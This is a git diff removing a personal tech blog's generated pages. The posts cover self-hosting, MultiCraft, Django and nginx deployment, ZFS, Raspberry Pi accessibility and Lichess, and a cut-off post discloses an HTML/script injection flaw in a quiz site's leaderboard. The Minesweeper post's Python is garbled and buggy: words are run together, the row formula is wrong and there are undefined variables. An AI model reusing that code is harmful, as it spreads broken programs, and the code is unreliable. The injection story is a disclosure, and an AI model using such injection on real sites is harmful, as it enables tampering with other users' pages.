Whatever you may believe about the YouTube personality Luke Smith,
-the quote above summarizes a core principle of mine.
-Much like many people have religious principles, I have Independence.
-
-
My choice to use Linux as my primary operating system,
-host my own website,
-own my own domain name—all of these are directly related to this core principle of independence.
-
-
I never want a man, or a company to have too much power over my life.
-Just like I would not trust just any person to be able to read my emails,
-know where I live, where I am going, who are my friends, what do I believe; in the same way, I do not trust a company with that same information.
-
-
-
“If you want to find out what a man is to the bottom, give him power. Any man can stand adversity — only a great man can stand prosperity.”—Robert Ingersoll
-
-
-
Take control of your own digital life:
-
-
-
Own your own domain.
-
Hookup an email and a website to that.
-
-
-
That’s it!
-
-
Without this, any of your internet privileges can be revoked at any time by Google, Facebook, YouTube, Twitter, or even an angry Twitter Mob. Maybe because they hate your skin colour, maybe they hate your religious/political views, or maybe you got caught on a technicality.
-
-
If you own your own domain, however:
-
-
Your email provider goes down/bans you: change your provider; keep the email.
-
-
Your website is pulled for controversial views: switch hosts.
-
-
Protect yourself; give yourself choices.
-Why give others that power when you could have it for yourself?
In a very odd combination of requirements,
-I needed to install MultiCraft on a Gentoo Linux system.
-The PHP USE flags are important so you don’t have to recompile it three times like I did.
-
-
Here are some useful tips I came across:
-
-
PHP USE flags
-
-
In /etc/portage/package.use/php I placed the following line:
-
-
-dev-lang/php cgi mysql mysqli fpm pdo gd truetype
-
-
-
This should give you enough for a mysql backended MultiCraft installation.
-The cgi option may not be required as fpm stands for FastCGI Process Managment.
-I don’t know for sure though.
-
-
Paper
-
-
This will grab the latest version of the Paper jar file using YivesMirror.
-I’m not sure how reputable it is,
-but my buddy who works with this stuff more often than me seemed to recognize it.
-
-
-## See the default craftbukkit.jar.conf for a detailed documentation of the
-## format of this file.
-[config]
-name = Paper 1.16.1 Latest
-source = https://yivesmirror.com/files/paper/Paper-1.16.1-latest.jar
-category = Mods
-
-[encoding]
-#encode = system
-#decode = system
-#fileEncoding = latin-1
-
-[start]
-command = "{JAVA}" -Xmx{MAX_MEMORY}M -Xms{START_MEMORY}M -XX:MaxPermSize=128M -Djline.terminal=jline.UnsupportedTerminal -jar "{JAR}" nogui
-
-
-
Other Tips
-
-
Do not use the option to setup a separate user for each server.
-This completely stalled any work getting done with a ton of ‘permission denied’ errors.
-
-
Security
-
-
If the panel is in the root directory of your NGINX web server,
-use the following in your server block to deny access to the /protected directory.
It is always good practice to separate privileges.
-The MultiCraft daemon should have one SQL login,
-with one database allocated to it.
-The MultiCraft panel should have a separate SQL login,
-with a separate database allocated to it.
-
-
You can do this with the following commands in your MySQL prompt:
-
-
-sql> CREATE DATABASE multicraft_daemon_database;
-Query OK, 0 rows affected (0.01 sec)
-
-sql> CREATE DATABASE multicraft_panel_database;
-Query OK, 0 rows affected (0.01 sec)
-
-sql> CREATE USER 'muilticraft_daemon'@'localhost' IDENTIFIED BY 'strong password here';
-Query OK, 0 rows affected (0.01 sec)
-
-sql> CREATE USER 'multicraft_panel'@'localhost' IDENTIFIED BY 'different strong password here';
-Query OK, 0 rows affected (0.01 sec)
-
-sql> GRANT ALL PRIVILEGES ON multicraft_daemon_database . * TO 'multicraft_daemon'@'localhost';
-Query OK, 0 rows affected (0.01 sec)
-
-sql> GRANT ALL PRIVILEGES ON multicraft_panel_database . * TO 'mutlicraft_panel'@'localhost';
-Query OK, 0 rows affected (0.01 sec)
-
-
-
-
During setup, make sure the proper credentials are used for each step.
-Database 1 is the panel database.
-Database 2 is the daemon database.
As an advocate for openness, I had an idea to make a project out of the government of Canada’s Open Data
-initiative to take a look at how my local MP voted on various pieces of legislation.
-It turns out though that this was not necessary due to how easy it was to find this information on the government’s own website.
-In this article, I will explain how you can do the same.
-
-
1. Find Your Representative
-
-
The first step in this process is to find who your representative is.
-To do so, go to the government’s own website
-ourcommons.ca’s search tool.
-
-
Simply type in your postal code in the search box to find out who your MP is.
-
-
2. Their Voting Record
-
-
Every MP’s voting record is public knowledge,
-and it is available nice and simple in a table on that MP’s page.
-For example, this is a link to
-Pierre Poilievre’s voting record.
-
-
To find your MP’s voting record, do step one, then:
-After the Overview, and Seat in The House sections,
-there are three tabs, Roles, Work, and Contact.
-Click on work.
-At the bottom of that tab is a link which says Chamber Votes.
-This will open a small window with some recent votes by this politician.
-If you want to see all their votes, there is a button at the bottom named All Votes by This Member.
-
-
Tada! You can now keep your local MP accountable for anything you do or do not support.
-
-
3. Bill Details
-
-
If you want to get into the nitty gritty,
-once you open a specific bill, you can actually find out the status of said bill,
-or read the actual text by clicking the View this Bill on LEGISinfo button.
-
-
Both the status of the bill, and a link to a PDF document containing the bilingual text of the bill are visible in the main body of the page.
-
-
Conclusion
-
-
I thought this was pretty cool!
-It was way simpler than I thought it would be.
As Linux becomes controlled by corporate sponsors and becomes more full of proprietary blobs, drivers, and even closed-source software like Steam,
-One may wonder if there are other options out there.
-For me, somebody that is intensely interested in security, there is one option: OpenBSD.
-
-
Now, my interest in OpenBSD has been going on for a long time.
-I started poking around for Linux alternatives way back a few years ago when Linus Torvalds decided to leave after he got in trouble for some
-unprofessional behaviour.
-That said, Linus did come back to Linux development,
-but I knew that his abrasive style is what brought good code to the Linux kernel.
-I also knew that his ability to be critical would be hurt by the new
-code of conduct.
-It would become a tool for the SJW types to hammer on Linus for being a “white male, et al.”;
-It would become a tool for the easily offended to use to get their dumb code into Linux;
-It would become a tool for the corporatization, the HR-ification of Linux.
-Frankly, this does not interest me.
-
-
Now I’m sure that OpenBSD has its own internal policies that I disagree with.
-That said, Theo De Raadt is still at least known for calling Firefox an “amorphous peace of garbage” due to its lack of privilege separation.
-And, in their project goals page, they specifically mention:
-
-
-
Be as politics-free as possible; solutions should be decided on the basis of technical merit.
-
-
-
Now that’s something I can get behind!
-Bet you that’s not in the Linux COC?
-
-
He also went to university in my hometown, so that’s pretty cool!
-I can support a local madman who thinks he can make a better operating system than all those corporations.
-Maybe he was right, maybe not. What I know is I am excited to find out!
-
-
Wish my luck on my OpenBSD journey. I will post updates here along the way.
A few days ago I had a Django project I wanted to put on a real server.
-This project is still in its infancy, but I thought it would be nice to put it on my resume and show my friends.
-Little did I know the headache coming my way.
-Here are some tips to help you not make the same mistakes as me.
-
-
ASGI Servers
-
-
Because my project used the ASGI (Asynchronous webServer Gateway Interface),
-I needed to find a good production ASGI server to handle all the incoming requests.
-The best thing I found was uvicorn.
-It focuses on speed, which is a priority, especially when using the ASGI protocol.
-
-
To run uvicorn on the command line for testing purposes, use something like the following:
-
-
-$ uvicorn --reload myapp.asgi:application
-
-
-
The --reload option says to reload the server if any of the files get updated.
-This is not recommended in production.
-Sadly, I thought this meant I would need to do a hard shutdown of the server process every time I wanted to update.
-This turned out to not be the case.
-
-
Workload Managers
-
-
There is another equine-named program called gunicorn
-which can hold a number of processes under its control.
-An interesting feature of gunicorn is that it will gracefully switch from an old to a new deployment,
-replacing the subprocesses one-by-one and eventually having only the new deployment active on all subprocesses.
-The greatest part? Zero down time.
-The server keeps any old processes open if there is communication with them,
-then shift and new connections to the new deployment.
-This was a very cool feature I wanted to take advantage of.
-
-
“Now hold on!” you might protest.
-“gunicorn is a WSGI server!” … oh you got me there!
-Yes, that’s right, gunicorn is paired with uvicorn to serve my files.
-
-
systemd
-
-
Love it or hate it, the majority of Linux distributions use the systemd init system.
-I decided it would be very convenient to have a .service file for my Django application to run automatically at boot.
-Systemd allows me to do this with a file like the following one I stored in /lib/systemd/system/lamegames.service.
NGINX (pronounced engine-X) is a performance web server designed for speed and simplicity.
-For the front facing side of the site, I do need a production web server like nginx.
-Gunicorn simply doesn’t need all the features that nginx provides, but I do.
-To configure my nginx installation, I used the following few directives to:
-
-
-
Redirect most traffic towards the gunicorn server.
-
Redirect statically served files (CSS, JS, images) to the directory specified in the STATIC_ROOT variable of my settings.py file.
-
Use TLS to enable https://
-
-
-
Serving the static files from nginx as opposed to the gunicorn server is necessary.
-Gunicorn and other production A/WSGI web server will not set the proper MIME type over TLS.
-This will cause your browser to not load the Javascript/CSS.
-
-
This is the important part of my nginx config.
-
-
-server {
- location / {
- proxy_set_header Host $http_host;
- proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
- proxy_set_header X-Forwarded-Proto $scheme;
- # these two lines ensure that WebSocket, and HTTP2 connection are forwarded correctly
- proxy_set_header Upgrade $http_upgrade;
- proxy_set_header Connection "Upgrade";
- proxy_redirect off;
- proxy_buffering off;
- # this forwards all traffic to the local server on port 8000
- proxy_pass http://localhost:8000;
- }
-
- # This forwards all static requests to Django's STATIC_ROOT set in settings.py; it is generated using the collectstatic command.
- location /static {
- autoindex on;
- alias /home/lame/lamegames.io/static_generated;
- }
-}
-
-
-
Setup
-
-
After all that, I was able to do the following:
-
-
-# systemctl enable lamegames
-
-
-
This enabled my gunicorn server to run once the server started.
-NGINX is that way be default.
-
-
And tada! You now have a working Django project on a production server!
-
-
Notes
-
-
-
If using ws:// websockets, change them to wss:// for secure web sockets.
-
Make sure to use channels.routing.get_default_application() instead of django.get_asgi_application() if your’re wanting to use channels/redis WebSockets.
When I was creating a little Minesweeper game, I got confused at some points.
-My bomb generation didn’t look quite right, and I for sure didn’t quite get the whole cascading tile reveal thing.
-With a bit of internet research, I found what I was looking for.
-I’ll explain it all in one place for my own research purposes.
-
-
Bomb Generation
-
-
When I started this project I attempted to use a random bomb generator.
-By this I mean on each square, before it gets generated, give it a one in 15 change of being a bomb.
-Personally, I’m not sure why this never looked right.
-Something about the layout of the bombs did not mimic the classic Minesweeper game.
-
-
After looking at some open source Minesweeper examples, I started to get the idea.
-I wrote some mathematical statements describing the generation of bombs and how to get their x,y position from an appropriate number.
-For those non-mathy people, don’t leave just yet;
-there will be code equivalents to the math.
-
-
W and H are the width and height of the board respectively.
-
-
0≤r≤W×H
-x=rmodW
-y=⌊Hr⌋
-
-
The code equivalent to this in Python is below:
-
-
importrandom
-# r <= 0 <= W*H
-r=random.randint(1,W*H)-1
-
-# x = r mod W
-x=r%W
-
-# y = floor(r/H); note the special syntax python has for this operation
-y=r//H
-
-
-
So that’s that, we can put this in a big ‘ol for loop and generate an arbitrary n number of bombs given a width and height of a Minesweeper board.
-
-
Cascading Tile Revealing
-
-
This one is hard to describe;
-I am adapting this from leetcode.com.
-Whenever a player clicks a tile, the following logic should be used:
-
-
-
If a mine is revealed, the game is over. (obviously)
-
If a tile with no adjacent mines is revealed, recursively reveal all eight adjacent tiles.
-
If a tile with one or more adjacent mines is revealed, display the number of mines next to it.
-
-
-
Here is the code in Python for this algorithm.
-
-
defreveal_square(x,y,board,alread_revealed):
- # if already checked
-if(x,y)inalready_revealed:
- return
- # if it's a bomb
-ifboard[x][y]=='B':
- you_lose()
- return
- # if the bomb number is more than 0
-already_revealed.append((nx,ny))
-
- # from -1 to 1
-forxdinrange(-1,2):
- forydinrange(-1,2):
- # skip if it is this the center tile
-ifx+xd==xandy+yd==y:
- continue
- # recursively check the adjacent square
-reveal(x+xd,y+yd,board,already_revealed)
- returnalready_revealed
-
-
-
This has no checks for valid squares, but it’s the general idea.
-This function returns an array of tile coordinates which should be revealed.
-
-
Conclusion
-
-
I wrote this because in the first place because I was writing my own Minesweeper game.
-I hope that this helps you with getting the general idea of a Minesweeper game.
-The completed version of this game is available on my lamegames site.
-Let me know what you think!
Curiosity is fundamental to a deep understanding of any subject.
-Masters, Ph.Ds, and other fancy name suffixes will never help you
-if you don’t have the spirit of curiosity burning inside of you.
-
-
I was speaking to someone from a journalism major at my school when the subject of hacking arose.
-I expected her to know nothing about it, being a journalism student and all, but surprisingly she had something to say about it:
-
-
-
“The best hackers are the ones who are curious.”
-
-
-
That struck a cord with me.
-It seems to me she has nailed down the difference between the students who care about grades,
-and those who want to learn.
-These are not necessarily mutually exclusive, but in my experience they often are due to the way education is structured.
-
-
My Anecdote
-
-
In my second semester at SAIT Polytechnic, I took a class entitled Emerging Trends In Technology.
-This class was probably the best class I have ever taken.
-We had to combine two things:
-
-
-
Hard skills: learning a new hard skill like Angular, Django, or GPG encryption.
-
Soft skills: public speaking and presentation of our ideas.
-
-
-
Soft skills are not usually my area, but I can do public speaking.
-I grew up quite religious, so public speaking was drilled into me young.
-I liked to go off script and talk about interesting things I found along the way to the actual point.
-My creativity was not usually encouraged.
-That said, going off script is useful when teaching and presenting ideas;
-it gives a natural air to your breath and an unquestionable confidence in your speech.
-
-
This is how we learn: in relationships.
-Try explaining ancient Japanese history to a computer science major, or UNIX sockets to an English major and you’ll see what I mean.
-If there is nothing for us to connect the knowledge to, it dissipates.
-
-
So why did I do so well in this class?
-
-
Our task for the semester was as follows:
-
-
-
Learn a new subject (any emerging trend in technology) which you find fascinating.
-
Give a one minute introduction by week three.
-
Give a 10 minute non-technical overview by week 8.
-
Give a 20 minute technical explaination and demo by week 13.
-
-
-
This is the only course I have ever taken which lets students’ imagination run wild.
-Their presentation, their rules.
-They treated the students like adults who know what they are doing.
-What happened? Everyone stopped coming because “Oh no! Presentations!”?
-
-
No, exactly the opposite.
-There was never more than one student missing.
-Every single presentation was at least moderately interesting,
-and most students were excited to come to that class.
-You could see it in their faces, the way they carried themselves.
-Every student picked something unique to their tastes, leaving every student more educated than before.
-
-
This class, unlike many others, encouraged the curiosity of the students.
-It rewarded those who had unique interests and an ability to sell others on their ideas.
-
-
The curiosity and the grades were one.
-
-
Conclusion
-
-
Although it’s nice to have a course where these goals align here and there, anyone who has been to collage or university can tell you that is far from the norm.
-
-
On the other hand, I never would have started this site if it wasn’t for that class alone.
-So I thank you, Kitty Wong, for getting me started running my own “research blog” (?)
Back in part one of my NAS project I discussed how I wanted to set up my hardware.
-Today, I set up the NAS (almost).
-
-
There were some hiccup along the way, like learning that M.2 slots can disable some of your SATA ports or waiting a month for a host bus adapter to come in from China.
-
-
Why Did It Take So Long
-
-
So it turns out I was going to spend a lot more on this project than I originally anticipated.
-I ended up getting a server machine instead of a sleek NAS box.
-Here are some of the quick specs:
-
-
-
Standard ATX case by Thermaltake.
-
LSI 9211-8i.
-
The cheapest HDMI graphics card I could find on Kijiji.
-
6x 3TB Segate HDDs.
-
1x 250G Kingston SSD.
-
AMD Ryzen 5 3600.
-
MSI B450 Gaming Plus Max.
-
2x 8GB FlareX 3200Mhz RAM.
-
1x 16GB Kingston 3200Mhz RAM.
-
-
-
ZFS
-
-
This is how I decided to configure my storage pools.
-In hindsight, this was not the best choice for upgrading.
-I may change it in the future to a 0+1 setup, but it works for now.
-
-
I have 5x 3TB in a RAIDZ2 with one drive not attached for redundancy’s sake.
-How does one setup a ZFS pool. Check this out:
And zippidy-doo! We’ve got a ZFS pool!
-We can check its status with zpool status.
-
-
-$ zfs status
- pool: raid
- state: ONLINE
- scan: scrub in progress since Wed Nov 18 18:41:41 2020
- 1.84T scanned at 8.51G/s, 121G issued at 562M/s, 1.84T total
- 0B repaired, 6.45% done, 0 days 00:53:25 to go
-config:
-
- NAME STATE READ WRITE CKSUM
- raid ONLINE 0 0 0
- raidz2-0 ONLINE 0 0 0
- ata-HGST_HUS724030ALA640_PN2234P8JTNMYY ONLINE 0 0 0
- ata-HGST_HUS724030ALA640_PN2234P8JVSXTY ONLINE 0 0 0
- ata-HGST_HUS724030ALA640_PN2234P8JXAS8Y ONLINE 0 0 0
- ata-HGST_HUS724030ALA640_PN2234P8JXBARY ONLINE 0 0 0
- ata-HGST_HUS724030ALA640_PN2234P8JXP77Y ONLINE 0 0 0
-
-errors: No known data errors
-
-
-
I had run a scrub right before this, so there’s some extra detail in that.
-This is really fun! I will be doing more home storage projects soon.
-Perhaps Raspberry Pi NAS using all 4 USB ports to load SATA drives on it.
-Now that would be fun!
-
-
So I Kinda Have A NAS Now…?
-
-
So right now I can only copy files with rsync, scp and moving data via a physical drive.
-The one major disadvantage this has is speed.
-
-
Due to this machine being connected directly outside my network and pulling DHCP like a normal router would, I need to send my data through the WAN connection to get my files to it.
-This is rather unfortunate as my upload speed is capped at 20 megabits per second, despite my upload being in the 300+ range.
-
-
Part 3 will involve a LAN card so I can connect both to the DHCP server of my ISP and my local router.
-This way my transfer speeds should be in the range of 1 gigabit per second.
-This will make my life much easier, at least on the local network.
-
-
Fun Fact!
-
-
Do not try to use the M.2 slot on a consumer motherboard where you are also using all the SATA ports.
-On my consumer gaming motherboard, the SATA ports next to the M.2 slot became disabled when I attached the M.2 SSD.
-I found this out form my motherboard documentation, which I read only after a week of thinking my motherboard itself was defective, and sending it in for repairs that did absolutely nothing.
-
-
Thoughts
-
-
I like having all this space. I plan on using it up pretty fast, so I’m already looking at how to expand.
-Hopefully that gives a decent overview of how I set up my drives.
-
-
Happy hacking!
-
-
-
-
-
-
-
-
-
diff --git a/_site/2020/12/01/pacaur-rpi/index.html b/_site/2020/12/01/pacaur-rpi/index.html
deleted file mode 100644
index 5056d7b..0000000
--- a/_site/2020/12/01/pacaur-rpi/index.html
+++ /dev/null
@@ -1,127 +0,0 @@
-
-
-
-
- Getting Pacaur Working on a Raspberry Pi 4 with Manjaro ARM or Arch Linux | tait.tech
-
-
-
-
-
-
-
-
-
-
tait.tech
-
-
-
-
-
-
-
-
Getting Pacaur Working on a Raspberry Pi 4 with Manjaro ARM or Arch Linux
-
-
-
-
-
I recently installed Manjaro ARM (based on Arch Linux ARM) on a Raspberry Pi 4.
-I used some standard commands to start to add the pacaur package so I can easily retrieve AUR packages without needing to do it manually.
-Unfortunately, there is a small problem with compiling this on ARM.
-
-
always_inline
-
-
To setup the install for pacaur, I first needed to download auracle-git AUR package manually.
-I ran into an error when compiling this package.
Around half way through compiling this project, I got this cryptic message telling me there was a “target specific option mismatch”…Whatever that means.
-The full error is below, hopefully that helps my chances on the search engines.
-
-
-In file included from ../subprojects/abseil-cpp-20200225.2/absl/random/internal/randen_hwaes.cc:225:
-/usr/lib/gcc/aarch64-unknown-linux-gnu/9.3.0/include/arm_neon.h: In function 'Vector128 {anonymous}::AesRound(const Vector128&, const Vector128&)':
-/usr/lib/gcc/aarch64-unknown-linux-gnu/9.3.0/include/arm_neon.h:12452:1: error: inlining failed in call to always_inline 'uint8x16_t vaesmcq_u8(uint8x16_t)': target specific option mismatch
-12452 | vaesmcq_u8 (uint8x16_t data)
-
-
-
Luckily, there is a very easy fix for this.
-The user redfish helpfully pointed out
-on the auracle-git package page that you need to add a special make option to your /etc/make.conf file to make this work.
-
-
His solution, as commented is like so:
-
-
-
If you get this error when building for ARM aarch64:
-
-
(insert error message from before)
-
-
Then check that in /etc/makepkg.conf CFLAGS and CXXFLAGS have the +crypto suffix in -march flag, like -march=armv8-a+crypto (the base identifier may very depending on your hardware)
-
-
-
Basically, there is a file on Linux: /etc/makepkg.conf which tells your computer how to compile all programs on the system.
-By default the Manjaro ARM (RPi4) edition has the following relevant lines in makepkg.conf.
What Mr. redfish is telling us is that we must add ‘+crypto’ to the end of the -march compiler flag so that our compiler will know how to inline that pesky vaesmcq_u8 function.
-
-
So in the end, your makepkg.conf’s relevant lines will look like so:
Build of abseil-cpp package works because it uses CMake which adds the correct -march flag regardless of makepkg.conf, whereas when abseil-cpp is build as a subproject within this package, it uses meson, which does not add the flag and thus fails with the above error.
-
-
-
In other words, one of the dependencies pulled in with auracle is not compiling without this special compiler flag enabled.
-
-
Conclusion
-
-
Thanks to redfish for posting this solution to the forums!
-Would’ve been quite the rabbit hole for me to figure out how to do that.
-In fact, it is very likely I would have never figured that one out.
-
-
After this issue is resolved, the installation of pacaur goes as expected. Nice and easy!
-Pacuar will compile on any architecture so it’s smooth sailing from here.
-
-
Happy hacking!
-
-
-
-
-
-
-
-
-
diff --git a/_site/2020/12/14/orca-raspberry-pi-manjaro/index.html b/_site/2020/12/14/orca-raspberry-pi-manjaro/index.html
deleted file mode 100644
index 3191561..0000000
--- a/_site/2020/12/14/orca-raspberry-pi-manjaro/index.html
+++ /dev/null
@@ -1,234 +0,0 @@
-
-
-
-
- Orca, Emacspeak and Chromium Accessibility on A Raspberry Pi Running Manjaro ARM | tait.tech
-
-
-
-
-
-
-
-
-
-
tait.tech
-
-
-
-
-
-
-
-
Orca, Emacspeak and Chromium Accessibility on A Raspberry Pi Running Manjaro ARM
-
-
-
-
-
I wanted to get a gift for my blind friend who has been interested in learning Linux for a while now.
-Just when I was about to start looking for something I decided to take a look at Brian Lunduke’s newest video featuring the Raspberry Pi 400.
-The Raspberry Pi 400 has come full circle in terms of computing.
-It is a keyboard. All the computing is done from within the keyboard.
-Much like the Comodore64, this computer comes without a screen but is still technically fully functional without one.
-I had my ‘Aha!’ moment, and decided that the Raspberry Pi 400 would be a very cool present.
-
-
No Headphone Jack
-
-
My first problem was that the Raspberry Pi 400 does not come with a headphone jack,
-even though every other Raspberry Pi A/B/B+ board with the exception of the compute modules and Zero series have included one.
-That said, the Raspberry Pi audio jacks are also known to crackle and pop due to either bad drivers or cheap manufacturing.
There are cheaper options for sure, but when I was looking around Raspberry Pi forums and Amazon reviews, this specific model seemed to come out on top in terms of performance.
-It costed me around 40 Canadian dollars.
-I figure this isn’t too bad considering my friend doesn’t need a screen, haha!
-
-
Distribution
-
-
I wanted to choose something which will age well, and run the latest and greatest.
-For visually impaired users, the most important piece of software is the screen reader. If the screen reader doesn’t work, the rest of the work is toast!
-Some Raspberry Pi Orca installation guides like this one,
-have actually asked the user to compile Orca from source to get the latest version due to how out-of-date Debian’s package repositories are.
-A distribution which has none of these fusses was top priority,
-especially because Orca receives frequent updates.
The only downside of Manjaro ARM, and likewise other Aarch64 (ARM 64-bit) architecture kernels is that it did not have HEVC nor H264 hardware decoding available.
-Apparently, support for the Raspberry Pi’s VC4 graphics is getting mainlined in Linux kernel 5.10.
-Unfortunately, running the release candidate (RC) kernel did not make the Raspberry Pi 400 use hardware decoding.
-Perhaps other applications like ffmpeg and Chromium need to add support as well before this works.
-
-
Orca
-
-
As stated before, minimum requirement for a visually impaired desktop Linux user is a screen reader.
-The most used screen reader for Linux is Orca, headed by the GNOME Project.
-This is relatively easy to install with a standard pacman command.
-
-
-# pacman -S orca
-
-
-
If logged in via SSH, you can start Orca with the orca command. This will start reading the screen to you so you can do the next parts.
-
-
To activate Orca on login with LightDM, enable it in the ‘LightDM GTK+ Greeter Settings’ application. The ‘Misc.’ tab will have a drop-down for asking which screen reader you want to use.
-This will start Orca when the LightDM login system starts.
-
-
LightDM’s Orca will not help us once we are logged in however.
-To activate Orca on login, open the ‘Session And Startup application’ program, then add Orca to the “startup” list of apps.
-
-
And now Orca will be activated on boot and login.
-
-
AUR
-
-
The AUR, or the Arch User Repository has community maintained and distributed packages.
-Basically, you download a file which will tell your computer how to download, build and install a package for you.
-
-
To get the AUR working in a more automatic way, we need to install the pacaur helper.
-This merited its own article, so check that out here:
-How to Install Pacaur on Manjaro ARM
-
-
The TL;DR is that we need to open the /etc/makepkg.conf file and replace any mention of -march=armv8-a with -march=armv8-a+crypto.
-
-
This can be done as a oneliner, thanks to the sed command.
-
-
-# sed -i 's/-march=armv8-a/-march=armv8-a+crypto/' /etc/makepkg.conf
-
-
-
Emacspeak
-
-
Emacs is a scriptable document editor run by the GNU Project.
-Infamous for its high learning curve though it may be,
-there is a very extensive speech extension for it called Emacspeak.
-Emacspeak is built entirely by T. V. Ramen and has been freely available since its inception in 1999.
-Due to its age (and thus maturity), Emacspeak is an important tool in any “eyes-free” software developer toolkit.
-
-
Lucky for me, Emacspeak appears to not only to be available in the AUR,
-but also compilable with the Aarch64 architecture—the architecture of the Raspberry Pi 400.
-So this is as easy to install as:
-
-
-$ pacaur -S emacspeak
-
-
-
Web Browsers
-
-
I’ll cover a couple web browsers here based on how they worked.
-
-
Firefox
-
-
Firefox will run in accessibility mode with caret browsing enabled automatically when it detects Orca is running.
-This makes Firefox by far the best browser for the job.
-
-
Chromium
-
-
Chromium… Ugh. So it works, sort of.
-You need to enable two special flags, and add an environment variable.
-
-
To do this, I suggest editing the main profile in /etc/profile.
-Add the following line to the end of that file:
-
-
-export ENABLE_ACCESSIBILITY=1
-
-
-
Next, add two flags to the $HOME/.config/chromium-flags.conf file.
You will need to relog to set the ENABLE_ACCESSIBILITY environment variable. Now Chromium should work with Orca.
-
-
Badwolf
-
-
The Badwolf browser
-is based on the WebkitGTK engine, as opposed to Firefox’s Gecko and Google’s Blink engines.
-It almost works out of the box. It is really fast compared to the other two,
-but it lacks some features like announcing a page is done loading and it doesn’t appear to support caret browsing,
-which will cause some other problems.
-Interesting though for such a young browser to have a minimal level of accessibility so early!
-
-
I would be interested where this goes in the future.
-
-
P.S.
-
-
Somehow I forgot that you would need to setup the dummy display driver to work with the graphics without a display attached.
-To do this, install the xf86-video-dummy pacakge:
-
-# pacman -S xf86-video-dummy
-
-
-
Next, override any /etc/X11/xorg.conf you may have with this:
Now, when you boot, you should head ‘Screen reader on’.
-
-
Conclusion
-
-
It took a bit of messing around to get this working, but I’m glad I did!
-Now I can nerd out with another Linux friend and given how well they seem to find problems with accessibility, hopefully a few upstream patches can be made.
I was getting ready to have a public test of some changes I made to lichess.org’s open source chess platform.
-In preperation, I got my Let’s Encrypt certificates and nginx configurations setup…
-and it wouldn’t work.
-Here are some tips for myself and future Lichess developers.
-
-
Reasoning
-
-
My pull request involves accessibility.
-It will extend Lichess’s NVUI (Non-Visual User Interface) to be more accessible to beginner level chess players.
-At the time of writing this, Lichess’s NVUI only supports searching pieces by type, rank and file.
-It does not support any kind of interactive board.
-
-
I wanted to play chess with a friend of mine who uses a screen reader.
-Even though Lichess does indeed have a separate rendering of the page for visually impaired users,
-I have heard from a few people that it is not the best.
-
-
I don’t use a screen reader myself, so I thought having a public latest changes deployed server would work better for testing.
-It would certainly work better than getting some of my less computer literate friends to connect to me via VSCode/VPN and view my local repository.
This is the part that stumps most people.
-Getting a local development server usually works alright, but once you want to reverse proxy it for security and professionalism purposes, it get more interesting.
-
-
Here is the relevant portion of my nginx configuration for lila:
The most common complaint amongst aspiring Lichess developers is websockets not working.
-They constantly get these ‘101’ responses from the websocket,
-and it also seems that the websocket returns instead of staying in the ‘pending’ state as it should be.
I wanted to play chess with somebody who used a screen reader, without requiring a screen reader myself;
-some sites, like QuintenC’s Playroom have a rather poor visual interface for anyone who would like the play the game visually.
-Lichess is an free and open-source website for chess players;
-it bridges this gap by having two “modes” on the site:
-standard mode and accessibility mode.
-
-
Accessibility Mode
-
-
Accessibility mode is far from perfect on lichess.org.
-That said, the idea to separate the sites into different modes was a good call.
-It stops the inevitable “this would work well for screen readers but cause visual issues” shenanigans,
-or, vice-verse “this looks great but it might be weird with a screen reader”.
-This way all the things which affect the visual interface are in one place,
-and all things which affect the non-visual user interface (NVUI) are written in another.
-
-
In my quest to play chess with visual and non-visual players with both having optimal experiences, I tried Lichess with my friend from melly.tech.
-She pointed out that the method to interface with the board previously was rather poor.
-This is because it required an “enter” at the end of each command and the commands tended to read out a row or column of a chessboard not just an individual square.
-
-
For example, to list all pieces (or lack thereof) on the e file, I would type the command:
-
-
s e
-
-
-
Although this seems good in theory, and it’s great when you need an entire file, there was no way to get only one square.
-In addition, imagine typing to navigate around the board:
-
-
s e1
-s f1
-s e2
-
-
-
For the inexperienced player, it seems to be more convenient to bind some keys and have the user bounce to various buttons, which they can push to say “I want to move this piece”.
-This is what I was told anyway.
-So I want to work making a system so you could use the following basic keys:
-
-
-
left/right/up/down arrow: move on the board.
-
k/q/r/b/n/p: move to next piece represented by its character in chess notation.
-
shift + k/q/r/b/n/p: move back to the last piece represented by its character in chess notation.
-
click/enter/space: select piece to move.
-
click/enter/space again: move piece here.
-
m: show where I can move with this piece.
-
shift+m: show where I can capture with this piece.
-
1-8: move to rank 1-8; stay on same file.
-
shift + 1-8: move to file a-h; stay on same rank.
-
-
-
This gives a pretty solid basis for playing the game.
-One caveat is after you have moved a pawn all the way to the farthest rank, only the destination tile will accept your promotion choice.
-Therefore, all the other keys still work on other square, but if you are on the destination square of a promotion q/r/b/n will promote your piece, not jump you to the next/previous one.
-
-
This pull request was merged earlier this month:
-
-
More To Come
-
-
Next thing I want to do is implement the analysis board.
-Right now it is not accessible whatsoever.
-
-
Help Me
-
-
If you are a screen reader user or know about accessibility and want to help make Lichess an awesome chess site for sighted and unsighted players alike,
-then send me an email at tait@tait.tech and I’ll BCC you once I start testing the analysis board.
Note: I have alerted the administrators of this site multiple times about this vulnerability.
-One email was sent many years ago, which is more than enough time for responsible disclosure.
-
-
Update: They have fixed the vulnerability as of the day of release for this article.
-
-
Background
-
-
In early 2014, when my “programming” skills consisted of editing web pages with inspect element, I was sent a link from an old friend in a town about 3 hours away.
-This was a link to a quiz about them.
-I had to answer as many questions right as I could about them and I got a score at the end based on my answers.
-It seemed fun enough, so I went for it.
-In the following weeks this quiz website became quite a trend amongst my friend group as we all started making quizes to see how well we all knew eachother.
-
-
A few weeks into this trend, I was staying at a friends’ place and told him about this site,
-so he goes and creates his own quiz and sends it to all his friends, group chats, Google Plus groups, et cetera.
-
-
Hackerman
-
-
While filling in my friend’s survey I thought it would be
-funny for them to know it is me without anyone else knowing.
-We were young and had Inspect Elemented a few things together,
-so it was a safe bet that an HTML joke would let them know.
-
-
I decided to write my name like so: <b>Steve</b>.
-Steve is in reference to the main character in the video game Minecraft.
-
-
-
-
-
Me typing in my name as <b>Steve</b>.
-
-
-
-
Now in theory this should have shown in in the leaderboard as: “<b>Steve</b>”
-However, to my horror and excitement, I saw this in the leaderboard:
-
-
-
-
-
<b>Steve</b> displaying in the leaderboard as bold text: Steve
-
-
-
-
The text “Steve” showed up in bold on the leaderboard.
-This told me all I needed to know.
-How did this happen? You might wonder.
-
-
Server-Side Validation
-
-
Here is a great demonstration why you should do most of your validation on the server side.
-As a user, I can edit any of the HTML, CSS, or Javascript your server serves to me.
-
-
Quiz your friends uses the maxlength=20 HTML attribute on the name input field.
-Imagine trying to fit in a script tag doing anything useful with 20 characters! Don’t forget that includes the <script> tag.
-That would leave 13 characters for Javascript.
